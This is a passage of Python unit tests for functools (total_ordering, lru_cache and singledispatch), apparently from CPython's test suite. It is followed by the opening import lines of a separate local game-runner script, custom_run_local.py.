ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
# LRU cache guarantees that it will only call __hash__
# only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additonal call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown-off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=-10, currsize=1))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can be not equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with support.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with support.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with support.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_early_detection_of_bad_call(self):
# Issue #22184
with self.assertRaises(TypeError):
@functools.lru_cache
def f():
pass
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, c.OrderedDict]
for haystack in permutations(bases):
m = mro(c.ChainMap, haystack)
self.assertEqual(m, [c.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(c.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [c.defaultdict, dict, c.Sized, c.Container,
object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(c.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
c.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(c.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, c.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(c.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(c.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
_orig_wkd = functools.WeakKeyDictionary
td = TracingDict()
functools.WeakKeyDictionary = lambda: td
c = collections
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
functools.WeakKeyDictionary = _orig_wkd
if __name__ == '__main__':
unittest.main()
|
custom_run_local.py
|
import asyncio
import subprocess
from multiprocessing import Process
import os
import json
from typing import List, Set
from pathlib import Path
from collections import deque
from arenaclient.proxy.frontend import GameRunner
from arenaclient.proxy.server import run_server
class RunLocal:
def __init__(self):
self.server_process = None
# Realtime and visualize setting, e.g. {"Realtime": False, "Visualize": False}
